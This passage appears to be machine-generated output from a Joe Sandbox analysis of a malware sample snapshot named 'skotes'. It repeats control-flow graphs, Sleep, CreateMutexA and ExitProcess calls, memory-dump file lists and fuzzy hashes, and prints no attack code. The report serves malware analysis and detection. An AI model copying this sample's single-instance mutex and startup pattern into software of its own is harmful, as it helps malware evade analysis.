                                                                                                                                                                                                                                              control_flow_graph 367 c0652b-c06538 call c0a302 370 c0655a-c0656c call c0656d ExitProcess 367->370 371 c0653a-c06548 GetPEB 367->371 371->370 373 c0654a-c06559 371->373 373->370
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32(?,?,00C0652A,?,?,?,?,?,00C07661), ref: 00C06567
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                                                              • Opcode ID: ecdfcaad572956bde13c43aafb291967de37e22e8b45ca271aca11835d189189
                                                                                                                                                                                                                                              • Instruction ID: c2648cfbf6c26f2f56c3b61fe4becbc1e85830e70d7d3e7cb99e10b42dbe7fb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecdfcaad572956bde13c43aafb291967de37e22e8b45ca271aca11835d189189
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61E08C30140608AECE267F58DC6DE8D3B29EF11741F544804FC184A262CB35EEA2D680

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: f7ad0cf8115254893426026717ab035ae5e8e253e5104168ea9d04abb4d5b801
                                                                                                                                                                                                                                              • Instruction ID: 072882abcea57e0c60476f1132505c34fb797db267728303075873bb2b501730
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7ad0cf8115254893426026717ab035ae5e8e253e5104168ea9d04abb4d5b801
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC315B717142409BFB08DB78DCD979EFBE2EBC6310F24829AE014973D6E77A99808751

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 22 bd9f44-bd9f64 26 bd9f66-bd9f72 22->26 27 bd9f92-bd9fae 22->27 28 bd9f88-bd9f8f call bed663 26->28 29 bd9f74-bd9f82 26->29 30 bd9fdc-bd9ffb 27->30 31 bd9fb0-bd9fbc 27->31 28->27 29->28 36 bda92b 29->36 34 bd9ffd-bda009 30->34 35 bda029-bda916 call be80c0 30->35 32 bd9fbe-bd9fcc 31->32 33 bd9fd2-bd9fd9 call bed663 31->33 32->33 32->36 33->30 39 bda01f-bda026 call bed663 34->39 40 bda00b-bda019 34->40 42 bda953-bda994 Sleep CreateMutexA 36->42 43 bda92b call c06c6a 36->43 39->35 40->36 40->39 52 bda9a7-bda9a8 42->52 53 bda996-bda998 42->53 43->42 53->52 54 bda99a-bda9a5 53->54 54->52
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: b9f852bd2087d64d500d3de39c1109d03acbe2e5d4cc7ecae416294349bf49ce
                                                                                                                                                                                                                                              • Instruction ID: 58141557325c90b7844617041da5924297993a1cd825c38a1af28b2c1882fa1b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9f852bd2087d64d500d3de39c1109d03acbe2e5d4cc7ecae416294349bf49ce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13315B717002409BFB18DB78DCD87ADF7E2EB86310F20869AE414D73D5E77A99808752

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 56 bda079-bda099 60 bda09b-bda0a7 56->60 61 bda0c7-bda0e3 56->61 62 bda0bd-bda0c4 call bed663 60->62 63 bda0a9-bda0b7 60->63 64 bda0e5-bda0f1 61->64 65 bda111-bda130 61->65 62->61 63->62 68 bda930-bda994 call c06c6a Sleep CreateMutexA 63->68 70 bda107-bda10e call bed663 64->70 71 bda0f3-bda101 64->71 66 bda15e-bda916 call be80c0 65->66 67 bda132-bda13e 65->67 72 bda154-bda15b call bed663 67->72 73 bda140-bda14e 67->73 86 bda9a7-bda9a8 68->86 87 bda996-bda998 68->87 70->65 71->68 71->70 72->66 73->68 73->72 87->86 88 bda99a-bda9a5 87->88 88->86
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
